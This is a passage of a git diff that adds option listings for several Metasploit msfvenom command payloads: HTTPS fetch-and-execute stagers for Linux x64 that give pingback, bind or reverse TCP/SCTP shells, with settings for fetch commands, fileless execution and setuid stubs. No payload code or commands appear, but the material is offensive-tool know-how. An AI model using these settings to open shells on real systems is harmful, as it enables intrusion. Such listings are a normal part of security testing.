+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + 
MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-pingback_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-pingback_bind_tcp.txt new file mode 100644 index 0000000..ef037c1 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-pingback_bind_tcp.txt 
@@ -0,0 +1,77 @@ + + Name: HTTPS Fetch, Linux x64 Pingback, Bind TCP Inline + Module: payload/cmd/linux/https/x64/pingback_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME LoTDCnfNFo no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. 
+ Accept a connection from attacker and report UUID (Linux x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that 
executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-pingback_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-pingback_reverse_tcp.txt new file mode 100644 index 0000000..45ad231 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-pingback_reverse_tcp.txt 
@@ -0,0 +1,84 @@ + + Name: HTTPS Fetch, Linux x64 Pingback, Reverse TCP Inline + Module: payload/cmd/linux/https/x64/pingback_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME uEHrdPTZV no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. 
+ Connect back to attacker and report UUID (Linux x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes 
the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-shell-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-shell-bind_tcp.txt new file mode 100644 index 0000000..738ffd9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-shell-bind_tcp.txt 
@@ -0,0 +1,91 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Stager + Module: payload/cmd/linux/https/x64/shell/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME HEIvAgov no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Spawn a command shell (staged). + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no 
A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-shell-reverse_sctp.txt b/msfvenom/payload_options/cmd-linux-https-x64-shell-reverse_sctp.txt new file mode 100644 index 0000000..aadbed6 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-shell-reverse_sctp.txt 
@@ -0,0 +1,99 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse SCTP Stager + Module: payload/cmd/linux/https/x64/shell/reverse_sctp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + ricky + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME HkOFGQQs no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no 
A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-shell-reverse_tcp.txt new file mode 100644 index 0000000..4897346 --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-https-x64-shell-reverse_tcp.txt 
@@ -0,0 +1,99 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/https/x64/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Normal + +Provided by: + Brendan Watters + ricky + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME fqFlcjcDOza no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no 
A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-shell_bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-shell_bind_ipv6_tcp.txt new file mode 100644 index 0000000..dd85d9c 
--- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-shell_bind_ipv6_tcp.txt 
@@ -0,0 +1,79 @@ + + Name: HTTPS Fetch, Linux x64 Command Shell, Bind TCP Inline (IPv6) + Module: payload/cmd/linux/https/x64/shell_bind_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + epi + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME yJDPlNdmUb no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Listen for an IPv6 connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system 
call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-shell_bind_tcp.txt new file mode 100644 index 0000000..f82aa6d --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-shell_bind_tcp.txt 
@@ -0,0 +1,79 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/https/x64/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME OaQKEeer no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
